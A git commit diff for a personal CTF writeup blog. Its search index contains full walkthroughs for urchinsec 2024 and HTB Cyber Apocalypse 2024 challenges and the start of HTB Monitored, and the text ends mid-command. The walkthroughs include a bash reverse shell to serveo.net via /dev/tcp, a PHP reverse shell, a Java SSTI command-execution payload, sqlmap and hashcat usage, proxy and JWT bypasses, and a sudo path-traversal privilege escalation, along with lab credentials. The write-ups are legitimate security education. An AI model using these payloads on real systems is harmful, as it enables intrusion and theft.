From a3eef303dd63f5f8ec896ce424aa4a9c0b551970 Mon Sep 17 00:00:00 2001 From: f0rk3b0mb Date: Sun, 28 Apr 2024 19:33:20 +0300 Subject: [PATCH] urchinsec --- categories/writeups/index.xml | 2 +- index.xml | 2 +- p/urchinsec_2024/index.html | 2 +- post/index.xml | 2 +- search/index.json | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/categories/writeups/index.xml b/categories/writeups/index.xml index 0f12acc..c64c415 100644 --- a/categories/writeups/index.xml +++ b/categories/writeups/index.xml @@ -353,7 +353,7 @@ difficulty: medium</p> </span></span></code></pre></td></tr></table> </div> </div><hr> -<p>On storage.billsys.urc we are provided with an instance of tiny file manager we also require creds to access it. *</p> +<p>On storage.billsys.urc we are provided with an instance of tiny file manager we also require creds to access it. It used defauld creds for tiny file manager.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 diff --git a/index.xml b/index.xml index 786bcc8..162d91a 100644 --- a/index.xml +++ b/index.xml @@ -353,7 +353,7 @@ difficulty: medium</p> </span></span></code></pre></td></tr></table> </div> </div><hr> -<p>On storage.billsys.urc we are provided with an instance of tiny file manager we also require creds to access it. *</p> +<p>On storage.billsys.urc we are provided with an instance of tiny file manager we also require creds to access it. It used defauld creds for tiny file manager.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 diff --git a/p/urchinsec_2024/index.html b/p/urchinsec_2024/index.html index fa8e7be..153b10d 100644 --- a/p/urchinsec_2024/index.html +++ b/p/urchinsec_2024/index.html @@ -774,7 +774,7 @@

Bill Systems


-

On storage.billsys.urc we are provided with an instance of tiny file manager we also require creds to access it. *

+

On storage.billsys.urc we are provided with an instance of tiny file manager we also require creds to access it. It used defauld creds for tiny file manager.

1
diff --git a/post/index.xml b/post/index.xml
index 4c5494d..21cb17d 100644
--- a/post/index.xml
+++ b/post/index.xml
@@ -353,7 +353,7 @@ difficulty: medium</p>
 </span></span></code></pre></td></tr></table>
 </div>
 </div><hr>
-<p>On storage.billsys.urc we are provided with an instance of tiny file manager we also require creds to access it. *</p>
+<p>On storage.billsys.urc we are provided with an instance of tiny file manager we also require creds to access it. It used defauld creds for tiny file manager.</p>
 <div class="highlight"><div class="chroma">
 <table class="lntable"><tr><td class="lntd">
 <pre tabindex="0" class="chroma"><code><span class="lnt">1
diff --git a/search/index.json b/search/index.json
index 2e92196..bd12f7b 100644
--- a/search/index.json
+++ b/search/index.json
@@ -1 +1 @@
-[{"content":"Writeup for urchinsec 2024 boot2root challenge This is the writeup for the boot 2 root challenge Bill Systems which i got the second solve.\nThis challneg requires knowledge in:\nrecon persistense lateral movement priviledge escalation Bill Systems categoty: boot2root difficulty: medium\nwe are given:\n1 2 3 SCOPE OF ENGAGEMENT domains : *.billsys.urc IP : 45.79.66.97 First we need to gather more info, so i ran an nmap scan to see open ports\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.7 (protocol 2.0) | ssh-hostkey: | 256 9e:cd:9e:38:58:35:4c:24:1a:01:29:0d:9d:26:fe:2b (ECDSA) |_ 256 50:35:25:83:7d:aa:d7:42:43:d4:bb:fa:e8:6c:12:bb (ED25519) 25/tcp filtered smtp 80/tcp open http |_http-title: Site doesn\u0026#39;t have a title (text/plain; charset=utf-8). | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:19 GMT | Content-Length: 0 | GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:12 GMT | Content-Length: 0 | HTTPOptions: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:13 GMT |_ Content-Length: 0 443/tcp open https? 3000/tcp open ppp? | fingerprint-strings: | GenericLines, Help, RTSPRequest: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Cache-Control: max-age=0, private, must-revalidate, no-transform | Content-Type: text/html; charset=utf-8 | Set-Cookie: i_like_gitea=7748aed9b1afa3fe; Path=/; HttpOnly; SameSite=Lax | Set-Cookie: _csrf=U5NJcsVjX-xLNIhZ6o64wSWiZd86MTcxNDIyMDExMzY5MDg3MDY4Nw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Sat, 27 Apr 2024 12:15:13 GMT | \u0026lt;!DOCTYPE html\u0026gt; | \u0026lt;html lang=\u0026#34;en-US\u0026#34; data-theme=\u0026#34;gitea-auto\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;meta name=\u0026#34;viewport\u0026#34; content=\u0026#34;width=device-width, initial-scale=1\u0026#34;\u0026gt; | \u0026lt;title\u0026gt;Gitea: Git with a cup of tea\u0026lt;/title\u0026gt; | \u0026lt;link rel=\u0026#34;manifest\u0026#34; href=\u0026#34;data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy9hc3NldHMvaW1nL2xvZ28ucG5nIiwidHlwZSI6ImltYWdlL3BuZyIsInNpem | HTTPOptions: | HTTP/1.0 405 Method Not Allowed | Allow: HEAD | Allow: GET | Cache-Control: max-age=0, private, must-revalidate, no-transform | Set-Cookie: i_like_gitea=e41496a78b8b88ad; Path=/; HttpOnly; SameSite=Lax | Set-Cookie: _csrf=vUtLqCC5_VSGwBmhopYmXC6PyWM6MTcxNDIyMDEyMDUyMzg0MjU2Mw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Sat, 27 Apr 2024 12:15:20 GMT |_ Content-Length: 0 3306/tcp open mysql MariaDB (unauthorized) 3333/tcp open nagios-nsca Nagios NSCA 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.94SVN%I=7%D=4/27%Time=662CEC50%P=x86_64-pc-linux-gnu%r(G SF:etRequest,4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202 SF:024\\x2012:15:12\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(HTTPOptions, SF:4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202024\\x2012: SF:15:13\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSPRequest,67,\u0026#34;HTTP/1 SF:\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset SF:=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(FourOhF SF:ourRequest,4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x20 SF:2024\\x2012:15:19\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(GenericLine SF:s,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain SF:;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request SF:\u0026#34;)%r(Help,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20te SF:xt/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x2 SF:0Request\u0026#34;)%r(SSLSessionReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nCo SF:ntent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n SF:\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(TerminalServerCookie,67,\u0026#34;HTTP/1\\.1\\x20400 SF:\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\n SF:Connection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(TLSSessionReq,67, SF:\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20 SF:charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r( SF:Kerberos,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20tex SF:t/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20 SF:Request\u0026#34;)%r(LPDString,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent SF:-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n4 SF:00\\x20Bad\\x20Request\u0026#34;)%r(LDAPSearchReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20R SF:equest\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\ SF:x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(SIPOptions,67,\u0026#34;HTTP/1\\.1\\x204 SF:00\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r SF:\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port3000-TCP:V=7.94SVN%I=7%D=4/27%Time=662CEC51%P=x86_64-pc-linux-gnu%r SF:(GenericLines,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x SF:20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Ba SF:d\\x20Request\u0026#34;)%r(GetRequest,38A1,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nCache-Contr SF:ol:\\x20max-age=0,\\x20private,\\x20must-revalidate,\\x20no-transform\\r\\nCo SF:ntent-Type:\\x20text/html;\\x20charset=utf-8\\r\\nSet-Cookie:\\x20i_like_git SF:ea=7748aed9b1afa3fe;\\x20Path=/;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nSet-Coo SF:kie:\\x20_csrf=U5NJcsVjX-xLNIhZ6o64wSWiZd86MTcxNDIyMDExMzY5MDg3MDY4Nw;\\x SF:20Path=/;\\x20Max-Age=86400;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nX-Frame-Opt SF:ions:\\x20SAMEORIGIN\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202024\\x2012:15:13\\x SF:20GMT\\r\\n\\r\\n\u0026lt;!DOCTYPE\\x20html\u0026gt;\\n\u0026lt;html\\x20lang=\\\u0026#34;en-US\\\u0026#34;\\x20data-theme= SF:\\\u0026#34;gitea-auto\\\u0026#34;\u0026gt;\\n\u0026lt;head\u0026gt;\\n\\t\u0026lt;meta\\x20name=\\\u0026#34;viewport\\\u0026#34;\\x20content=\\\u0026#34;widt SF:h=device-width,\\x20initial-scale=1\\\u0026#34;\u0026gt;\\n\\t\u0026lt;title\u0026gt;Gitea:\\x20Git\\x20with\\x SF:20a\\x20cup\\x20of\\x20tea\u0026lt;/title\u0026gt;\\n\\t\u0026lt;link\\x20rel=\\\u0026#34;manifest\\\u0026#34;\\x20href=\\\u0026#34; SF:data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG SF:9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic SF:3RhcnRfdXJsIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy8iLCJpY29ucyI6W3sic3JjIjoi SF:aHR0cDovL2dpdC5iaWxsc3lzLnVyYy9hc3NldHMvaW1nL2xvZ28ucG5nIiwidHlwZSI6Iml SF:tYWdlL3BuZyIsInNpem\u0026#34;)%r(Help,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n SF:Content-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r SF:\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(HTTPOptions,197,\u0026#34;HTTP/1\\.0\\x20405\\x20Me SF:thod\\x20Not\\x20Allowed\\r\\nAllow:\\x20HEAD\\r\\nAllow:\\x20GET\\r\\nCache-Cont SF:rol:\\x20max-age=0,\\x20private,\\x20must-revalidate,\\x20no-transform\\r\\nS SF:et-Cookie:\\x20i_like_gitea=e41496a78b8b88ad;\\x20Path=/;\\x20HttpOnly;\\x2 SF:0SameSite=Lax\\r\\nSet-Cookie:\\x20_csrf=vUtLqCC5_VSGwBmhopYmXC6PyWM6MTcxN SF:DIyMDEyMDUyMzg0MjU2Mw;\\x20Path=/;\\x20Max-Age=86400;\\x20HttpOnly;\\x20Sam SF:eSite=Lax\\r\\nX-Frame-Options:\\x20SAMEORIGIN\\r\\nDate:\\x20Sat,\\x2027\\x20A SF:pr\\x202024\\x2012:15:20\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSPR SF:equest,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/ SF:plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Re SF:quest\u0026#34;); Only ports of interest were 22, 25 , 80 , 3306\non port 80 is bills portfolio other than that there is nothing interesting\nso we try and get the subdomains:\nThere are two subdomains :\ngit.billsys.urc - this is running a local instance of gittea storage.billsys.urc - this is running am instance of tiny file manager On git.billsys.urc we create an account and login. There are other users and repos but the one that sticks out is that of bill.\nIt is source code for a python web app called sesame.\nLooking at the commits we see a sqllite instance database that had been ommited we download it and view contents\ncracking the user hash we get the password\n1 ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f : password123 On storage.billsys.urc we are provided with an instance of tiny file manager we also require creds to access it. *\n1 admin : admin@123 Here we can upload files , so i upload a php rev shell\nDropping to the shell we see that we are user \u0026ldquo;http\u0026rdquo;. There is no obvious method of priv esc.\nI was stuck here till i checked the open ports on the machine using netstat.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:5355 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 38132/python3 tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp6 0 0 :::5355 :::* LISTEN - tcp6 0 0 :::3306 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 :::3000 :::* LISTEN - tcp6 0 0 :::3333 :::* LISTEN - As you see above there is a service on port 80 that is only accessed internally.\nTo access this from our attack box we will need to use a tunnel client like chisel. You can get chisel \u0026raquo; here\n1 2 on attackbox \u0026gt;\u0026gt; ./chisel server -p 8000 --reverse on chal machine \u0026gt;\u0026gt; ./chisel client \u0026lt;ip\u0026gt;:8000 R:8001:127.0.0.1:8080 After this we can access the service on port 80 which is the sesame application we got the src earlier.\nOn the sesame applicatiion we login with the creds we found in the sqlite db file.\nIf you read the src this application is used by bill to read files in the server.\nThere is nothing else interesting so i looked through the source code.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 in main.py def dashboard(): if request.method == \u0026#34;GET\u0026#34;: return render_template(\u0026#39;dash.html\u0026#39;) if request.method == \u0026#34;POST\u0026#34;: key = request.form.get(\u0026#34;key\u0026#34;) file_read = request.form.get(\u0026#34;fileread\u0026#34;) check_key = SesameKey.query.filter_by(key=key).first() if check_key is not None: num = 107 stk = chr(num) secret = \u0026#39;\u0026#39;.join([chr(ord(x) ^ ord(stk)) for x in key]) with open(\u0026#34;temp_secret\u0026#34;, \u0026#34;w\u0026#34;) as temp: temp.write(secret) command = f\u0026#34;sudo sesame -i temp_secret -r {file_read}\u0026#34; run = subprocess.check_output(command, shell=True) run = run.decode(\u0026#39;utf-8\u0026#39;) os.system(f\u0026#34;rm -rf temp_secret\u0026#34;) return render_template(\u0026#39;dash.html\u0026#39;, message=\u0026#34;It Works\u0026#34;) else: return render_template(\u0026#39;dash.html\u0026#39;, message=\u0026#34;Wrong Key\u0026#34;) If you look carefully our user input is not being sanitized and it is being put directly to subprocess module. Seeing this you immediately think command execution.\nThe catch is that the output of a command you run will not be displayed.\nSo after some trial i created:\n1 key=IpwnEazy@@#TH!ngG5~\u0026amp;fileread=/etc/passwd; bash -c \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/serveo.net/33997 0\u0026gt;\u0026amp;1\u0026#34;\u0026amp;action= This gets us a reverse shell. We are now the user bill. From here i created ssh keys so that i could login via ssh which is better and more stable.\nOur target now us to achieve root.\nRunning sudo -l we can see that our user can run \u0026ldquo;sesame\u0026rdquo; command with sudo rights.\nThis command is used earlier in the python application\n1 2 3 Running : sudo sesame -i temp_secret -r /etc/shadow Note: shadow file is only read by root so with this command we can read files as the root user. 1 2 3 4 5 6 7 8 9 Error: -i is a required argument Usage of sesame: -h\tPrints This Output -i string Input Secret File To Read Secret (-i /path/to/secret.txt) -r string File To Read (-r /path/to/filetoread.txt) -s\tChange Permissions Of Files It also supports changing of file permissions with -s flag.\nSO in order to read the root flag we can exploit this. So after some trial and error i did this\n1 2 3 4 5 6 7 8 9 10 11 12 sudo sesame -i temp_secret -s When it prompts for a file enter ../../../../../../root/. When it prompts for permission 777 This above will make the root permission be rwx by everyone.\n1 . (dot): This refers to the current directory. For example, if you\u0026#39;re in the directory /home/user, then . refers to /home/user. From here you can read the root flag\nflag : urchinsec{I_know_CTF_This_S3rV35_IS_we334akK_NEXTTTT}\n","date":"2024-04-28T18:07:14+03:00","image":"https://f0rk3b0mb.github.io/cover/urchinsec.png","permalink":"https://f0rk3b0mb.github.io/p/urchinsec_2024/","title":"Urchinsec_2024"},{"content":"This is the writeup of HTB cyber apocalypse 2024 web challenges.\nI participated with my team \u0026ldquo;Gang de la Sinfonia\u0026rdquo;.\nWeb Category TimeKORP rating: very easy\nHere you are provided with a webpage that has a parameter ?format=%H:%M:%D , from the source code it was running linux date command from that syntax.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 \u0026lt;?php class TimeModel { public function __construct($format) { $this-\u0026gt;command = \u0026#34;date \u0026#39;+\u0026#34; . $format . \u0026#34;\u0026#39; 2\u0026gt;\u0026amp;1\u0026#34;; } public function getTime() { $time = exec($this-\u0026gt;command); $res = isset($time) ? $time : \u0026#39;?\u0026#39;; return $res; } } This is classic command injection.\n1 payload : %H:%M:%D\u0026#39;;cat flag.txt flag: HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}\nKORP terminal rating: very easy\nFor this challnge you are provided with a login page that requires a username and password. So it has to be login bypass.\nGiven the rating of this challenge just throw sqlmap at it. You can also confirm this by using a single quote ,it return a sql error.\nOutput from slqmap\nFrom this we get a user admin and the password hash.\n1 admin: $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. 1 2 3 hashcat -m 3200 hashcat.txt /usr/share/wordlists/rockyou.txt $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123 Cracking the password using hashcat we get the password : password123\nWe can then login to get the flag\nflag: HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}\nFlag command rating: very easy\nHere we are given an applicating that requires a bunch of commands to navigate a puzzle. When you intercept the traffic using burp you will see an endpoint with a list of the commands.\nHere we can see a secret command. Using it\u0026hellip;\nflag: HTB{D3v3l0p3r_t00l5_4r3_b35t_wh4t_y0u_Th1nk??!}\nLabrinth Linguist rating: easy\nHere we are given a webapp that translates text that we give it.\nOooooh its a java application. I wasnt expecting thsi to be straight forward. But \u0026hellip;\n1 2 3 4 5 6 7 String template = \u0026#34;\u0026#34;; try { template = readFileToString(\u0026#34;/app/src/main/resources/templates/index.html\u0026#34;, textString); } catch (IOException e) { e.printStackTrace(); } Our input was being used in a template. This is dangerous if no filters are applied. I quickly googled SSTI in java (Server Side Template Injection) payloads. Got this \u0026raquo; here .\nFrom here we can execute commands and cat the flag. Credits to Anshul for doing this. I had a problem using the payload in burp suite due to the newlines.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 #set($s=\u0026#34;\u0026#34;) #set($stringClass=$s.getClass()) #set($stringBuilderClass=$stringClass.forName(\u0026#34;java.lang.StringBuilder\u0026#34;)) #set($inputStreamClass=$stringClass.forName(\u0026#34;java.io.InputStream\u0026#34;)) #set($readerClass=$stringClass.forName(\u0026#34;java.io.Reader\u0026#34;)) #set($inputStreamReaderClass=$stringClass.forName(\u0026#34;java.io.InputStreamReader\u0026#34;)) #set($bufferedReaderClass=$stringClass.forName(\u0026#34;java.io.BufferedReader\u0026#34;)) #set($collectorsClass=$stringClass.forName(\u0026#34;java.util.stream.Collectors\u0026#34;)) #set($systemClass=$stringClass.forName(\u0026#34;java.lang.System\u0026#34;)) #set($stringBuilderConstructor=$stringBuilderClass.getConstructor()) #set($inputStreamReaderConstructor=$inputStreamReaderClass.getConstructor($inputStreamClass)) #set($bufferedReaderConstructor=$bufferedReaderClass.getConstructor($readerClass)) #set($runtime=$stringClass.forName(\u0026#34;java.lang.Runtime\u0026#34;).getRuntime()) #set($process=$runtime.exec(\u0026#34;cat ../flag2023911480.txt\u0026#34;)) #set($null=$process.waitFor() ) #set($inputStream=$process.getInputStream()) #set($inputStreamReader=$inputStreamReaderConstructor.newInstance($inputStream)) #set($bufferedReader=$bufferedReaderConstructor.newInstance($inputStreamReader)) #set($stringBuilder=$stringBuilderConstructor.newInstance()) #set($output=$bufferedReader.lines().collect($collectorsClass.joining($systemClass.lineSeparator()))) $output Just use the payload in the browser and capture the request in burp.\nflag : HTB{f13ry_t3mpl4t35_fr0m_th3_d3pth5!!}\nLocktalk rating: medium\nThis is where things got interesting.\nHere you are given a webapplication with an api blueprint.\nThe api had three routes:\n1 2 3 4 5 /flag protected by middleware /chat/\u0026lt;int:chat_id\u0026gt; protected by middleware /get_ticket open but blocked by ha proxy A quick look at the proxy configuration\n1 2 3 4 5 frontend haproxy bind 0.0.0.0:1337 default_backend backend http-request deny if { path_beg,url_dec -i /api/v1/get_ticket } So we had to find a way to bypass this. I used a lot of time on this part. Until i found this \u0026raquo; here\nTo make your search easier you had to find the ha proxy version from the dockerfile : PS i had forgotten do thsi , it could have made my work easier.\n1 2 3 4 5 6 WORKDIR /tmp RUN wget https://www.haproxy.org/download/2.8/src/haproxy-2.8.1.tar.gz \u0026amp;\u0026amp; \\ tar zxvf haproxy-*.tar.gz \u0026amp;\u0026amp; cd haproxy-* \u0026amp;\u0026amp; \\ make TARGET=linux-musl \u0026amp;\u0026amp; \\ make install RUN rm -rf * From the article if we make a request to /api/v1/get_ticket we get denied but if we make request to /api/v1/get_ticket# we bypass the acl.\nFrom here i gotr the jwt token. I tries common methos of exploiting jwt but none of them worked. UNtil i searched for a vulnerability in python_jwt==3.3.3 from the requirements.txt\nI found this vulnerability that enables us to bypass the jwt verification \u0026raquo; here and for the exploit \u0026raquo; here\nWe change our role to administrator and then read the flag\nflag: HTB{h4Pr0Xy_n3v3r_D1s@pp01n4s}\nTestimonial Here we are given a webapplication that accepts parameters customer and testimonial.\nIt is a go webapplication witha grpc endpoint. I saw some people asking on the discord why there were two ip addresses. One if for the main webapp and one was for grpc. Read more about grpc \u0026raquo; here\nIve encountered with grpc before. So the tools we will need are grpcurl and grpcui. In this context grpcui will not work.\n1 grpcurl -plaintext -import-path ./ -proto ptypes.proto -d \u0026#39;{\u0026#34;customer\u0026#34;: \u0026#34;examplecusomer\u0026#34;, \u0026#34;testimonial\u0026#34;: \u0026#34;exampletestimonial\u0026#34;}\u0026#39; 94.237.59.119:45387 RickyService.SubmitTestimonial Above is the format for grpcurl. Breakdown:\nptypes.proto file is in the pb folder . This is used to enable grpcurl to interact with the server since service enumaration was disables . This is what caused grpcui not to work.\nThe service and method name can be found in the source code.\nUsing this will also enable you to bypass the filter that was placed in the code\n1 2 3 for _, char := range []string{\u0026#34;/\u0026#34;, \u0026#34;\\\\\u0026#34;, \u0026#34;:\u0026#34;, \u0026#34;*\u0026#34;, \u0026#34;?\u0026#34;, \u0026#34;\\\u0026#34;\u0026#34;, \u0026#34;\u0026lt;\u0026#34;, \u0026#34;\u0026gt;\u0026#34;, \u0026#34;|\u0026#34;, \u0026#34;.\u0026#34;} { customer = strings.ReplaceAll(customer, char, \u0026#34;\u0026#34;) } NOTE: Beyond this point i did after the ctf , i did not solve this one.\nOfficial writeup \u0026raquo; https://github.com/hackthebox/cyber-apocalypse-2024/tree/main/web/%5BEasy%5D%20Testimonial\n","date":"2024-03-11T13:23:40+03:00","image":"https://f0rk3b0mb.github.io/cover/ca2024.png","permalink":"https://f0rk3b0mb.github.io/p/htb_cyberapocalypse_2024/","title":"HTB_cyberapocalypse_2024"},{"content":"HTB monitored Writeup for HTB monitored box\nrated: medium category: web\nNmap Scan\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 08:28 EAT Warning: 10.10.11.248 giving up on port because retransmission cap hit (6). Nmap scan report for monitored.htb (10.10.11.248) Host is up (0.36s latency). Not shown: 988 closed ports PORT STATE SERVICE VERSION 68/udp open|filtered dhcpc 123/udp open ntp NTP v4 (unsynchronized) | ntp-info: |_ 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: 6f3fa7421af94c6500000000 | snmpEngineBoots: 35 |_ snmpEngineTime: 48m05s | snmp-netstat: | TCP 0.0.0.0:22 0.0.0.0:0 | TCP 0.0.0.0:389 0.0.0.0:0 | TCP 127.0.0.1:25 0.0.0.0:0 |_ UDP 0.0.0.0:68 *:* | snmp-processes: | 1: | | 2: | |_ 3: | snmp-sysdescr: Linux monitored 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64 |_ System uptime: 48m5.77s (288577 timeticks) |_snmp-win32-software: 162/udp open snmp net-snmp; net-snmp SNMPv3 server | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: 5a44ab2146ff4c6500000000 | snmpEngineBoots: 26 |_ snmpEngineTime: 48m05s 1100/udp open|filtered mctp 1813/udp open|filtered radacct 3130/udp open|filtered squid-ipc 19500/udp open|filtered unknown 22053/udp open|filtered unknown 27444/udp open|filtered Trinoo_Bcast 44190/udp open|filtered unknown 49259/udp open|filtered unknown Service Info: Host: monitored Host script results: |_clock-skew: 10s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1302.38 seconds Snmp enumeration\n1 snmpwalk -v1 -c public monitored.htb we get creds for username: svc pass: XjH7VCehowpR1xZB\nMaking a post request to /api/v1/authenticate we get access token that we can use to login\n1 2 https://nagios.monitored.htb/nagiosxi/index.php?token=1562fdd66ece5a71f970399218ab842b6c8674c0 this nagios is vulnerable to sql injection \u0026raquo; see here\n1 sqlmap -u \u0026#34;https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php\u0026#34; --data=\u0026#34;id=3\u0026amp;action=acknowledge_banner_message\u0026#34; --cookie \u0026#34;nagiosxi=40ka0uvgngmjev8i267hq2qt9p\u0026#34; --dbms=MySQL --level=1 --risk=1 -D nagiosxi -T xi_users --dump Dumping the db enables us to get an admin api key : IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL\nWe can now create our owm user with full privilldeges\n1 curl -XPOST -k 